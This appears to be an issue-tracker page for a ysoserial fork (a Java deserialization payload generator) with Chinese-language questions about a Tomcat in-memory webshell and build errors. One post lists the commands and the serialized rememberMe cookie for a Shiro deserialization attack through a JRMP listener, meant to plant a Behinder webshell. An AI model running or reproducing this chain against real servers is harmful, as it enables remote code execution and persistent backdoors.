ysoserial
ysoserial copied to clipboard
Litch1-v
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
师傅您好,我在看tomcat通用回显的内存马源码的时候看到这两句 ` (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();\n" + " org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());` 本地环境tomcat8.5.78中的getResources返回值是null,导致这一句抛出异常
 出现了报错 本身只有jdk1.8 好像没法兼容
:(
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections4TomcatShell "pass" >1.ser java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 1.ser python shiro_exp_payload.py 192.168.110.8:1099 rememberMe=BWRrrnY1Q7yCjBqZvLtEeC+2z/3ZRCVDO2zmN1JAL9MGehwC4BdEE9Hk/cdb9D3r3egy+qRveCHkiMlRItRdE4dudhfKG0e/1If8CSIpLjRCW2lIMmU2WcZh8eUaWAoRRInb9Jri9TMUMH4YrP7sDknMRSHavsB2vdrdAiuoHK/wj5XDsbhURldTUAxvPnmf5iH0ML2go2oVwDe7eZ5WASqZ3c6zz51EKj91/983rl7NjlHyI5nTVrbvwt0mJMj5rqZeN0XfXEOJHL8VLOiW0d5JEEcihgm+QPZ71/QFG6S5WEU7eXsvS3hOsTUCiFD6MIQiKh5pXYaquoAgN/yK406jTnI7+DcHUsDcZD0yyZlr4ViqU7PZ0654YtUAZH1WsKKthWK13OW2k1sD8QoKzw== 长亭的大表哥,是这样弄的嘛,Shiro,修改后的冰蝎连接不上,小弟有点菜,麻烦表哥抽空给我解答一下
打包出错
您好,为什么会出现编译出错呢?这是我的报错以及版本信息。可不可以解答一下,万分感谢  
